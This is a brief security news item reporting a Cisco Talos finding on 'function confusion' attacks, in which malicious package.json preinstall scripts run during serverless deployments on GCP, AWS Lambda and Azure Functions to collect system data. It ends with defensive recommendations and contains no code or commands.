New cloud attack targets serverless platforms

A newly identified cloud-based threat dubbed “function confusion” is allowing attackers to exploit serverless computing platforms like Google Cloud Platform, AWS Lambda, and Azure Functions by embedding malicious code in package installation scripts, Cyber Security News reports.

Security analysts at Cisco Talos discovered that the vulnerability enables the execution of unauthorized commands through manipulated “Node.js package.json” files, specifically the "preinstall" script section. These scripts automatically run during cloud function deployments, enabling the collection of sensitive information such as OS details, user data, and network configurations, often undetected by traditional defenses. Attackers used packages like “myconfusedfunctionpoctestpackage” to access and exfiltrate data from files like “/etc/passwd” and “/etc/os-release.” The technique bypasses conventional security controls and highlights a broader systemic risk in how cloud platforms handle dependencies. Cisco Talos recommends tightening oversight of third-party packages, limiting outbound network access during deployments, and improving logging to counter this stealthy and portable method of cloud exploitation.